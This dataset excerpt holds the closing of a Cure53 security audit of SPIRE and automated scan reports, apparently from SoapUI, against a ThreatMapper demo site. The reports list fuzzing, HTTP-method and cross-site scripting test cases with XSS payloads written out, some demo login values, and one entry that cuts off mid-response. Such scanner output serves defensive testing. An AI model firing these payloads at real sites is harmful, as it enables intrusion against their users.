remove the deprecated legacy node API. While this\nwas found to be an anomaly, SPI-01-001 was present throughout the examined code of\nSPIRE. This seems to be a more fundamental issue that could have arisen from the\nSPIFFE specification. The security-relevance of building, parsing and interpreting\nCure53, Berlin \u00b7 02/10/21 26/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nSPIFFE IDs consistently in all environments of all federated Trust Zones is thereby\nresonated. In addition, the specification could stress the danger of embedding user input\ninto attested SPIFFE IDs while applying Path Normalization as observed in SPI-01-001\nor SPI-01-007.\nJudging by the rest of the issues and the complexity of the project, it can be argued that\nthe developers of the reference implementation of SPIFFE have proven their awareness\nof modern vulnerabilities. The mitigations they have crafted and utilized are capable of\nreducing the attack preponderance of the SPIRE complex on the whole, as evident from\na small number and generally limited numbers of findings. This is especially impressive\nin the face of the sheer size of the codebase, indicating that there really is not that much\nto improve from the auditors\u2019 perspective. With remediation of the issues highlighted by\nCure53 above, the already high level of security would be increased even further.\nFinally, it is important to stress the good flow and efficiency of the communication\nbetween the testers and the SPIFFE team. No questions were left unanswered and the\nprovided self-security assessments fostered understanding the concepts and security\nmodel of the whole project. Additional material regarding potential attacker models and\ngreater worries also served the purpose of streamlining testing efforts. To conclude,\nwhile several issues were spotted and documented in this January 2021 project, the\noverall impressions of the state of security and its documentation are positive. It is clear\nthat the SPIRE project maintainers are on the right track regarding security.\nCure53 would like to thank Andres Vega, Agust\u00edn Mart\u00ednez Fay\u00f3, Andrew Harding and\nEvan Gilman from the SPIRE team as well as Chris Aniszczyk of The Linux Foundation,\nfor their excellent project coordination, support and assistance, both before and during\nthis assignment. Special gratitude needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin \u00b7 02/10/21 27/27" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 2 2021-04-14 19_53_06.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 2\nin Project 6/Security Test Suite 2/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 19:53:06\nTime taken 00:03:40.385\nTotal scans performed: 1726\nIssues found: 0" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-15 16_58_06.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 8/Security Test Suite 1/https://deepfence.show TestCase\nSummary\nStarted at 2021-04-15 16:58:06\nTime taken 00:17:01.312\nTotal scans performed: 2042\nIssues found: 1990\nScan Issues Found In Test StepsTotal Issues \nFound\nFuzzing Scan GET 100 100\nXPath Injection GET 20 20\nHTTP Method \nFuzzingGET 10 10\nCross Site \nScriptingGET 184 184\nSQL Injection GET 1626 1626\nInvalid Types GET 50 50\nDetailed Info\nIssues are grouped by Security scan.\nFuzzing Scan\nA Fuzzing Security Scan generates random content and inserts it into your parameters, trying to \ncause your API to behave incorrectly or reveal sensitive data.\nErrors usually indicate that you have to improve input validation and error handling.\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.iooEVuz2MMq\nDemoUser1# AdFI9GIn9CZISDk\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence DeepFence \nError
Cannot COPY /
\n\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #121\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/Request UNLOCK https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n605 Content length: \nFull response:\n \nError
Cannot UNLOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #122\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest LOCK https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n603 Content length: \nFull response:\n \nError
Cannot LOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #123\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PROPFIND https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n607 Content length: \nFull response:\n \nError
Cannot PROPFIND /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #124\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PATCH https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n604 Content length: \nFull response:\n \nError
Cannot PATCH /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #125\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest OPTIONS https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuemethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #126\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest HEAD https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #127\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest DELETE https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n605 Content length: \nFull response:\n \nError
Cannot DELETE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #128Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PUT https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n602 Content length: \nFull response:\n \nError
Cannot PUT /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #129\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest POST https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n603 Content length: \nFull response:\n \nError
Cannot POST /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #130Cross Site Scripting\nA Cross-Site Scripting (XSS) Scan attacks clients of the system under test by inserting dynamic code \nlike JavaScript into the input, hoping that the same code is echoed in the response. \nHowever, this is only a problem if the response is consumed directly by a browser or if HTML is built \nin a naive way from the response. In other words, Cross-Site Scripting Scans may sometimes give \nyou false positives.\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #131\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ ';alert(String.fromCharCode(88,83,83))//\\';alert(deepfence.io String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(\n88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT\n>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #132\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '';!--\"<XSS>=&{()}\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #133\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=http://soapui.org/xss.js></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #134\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #135\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #136\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=JaVaScRiPt:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #137\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert(&quot;XSS&quot;)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #138\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #139\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 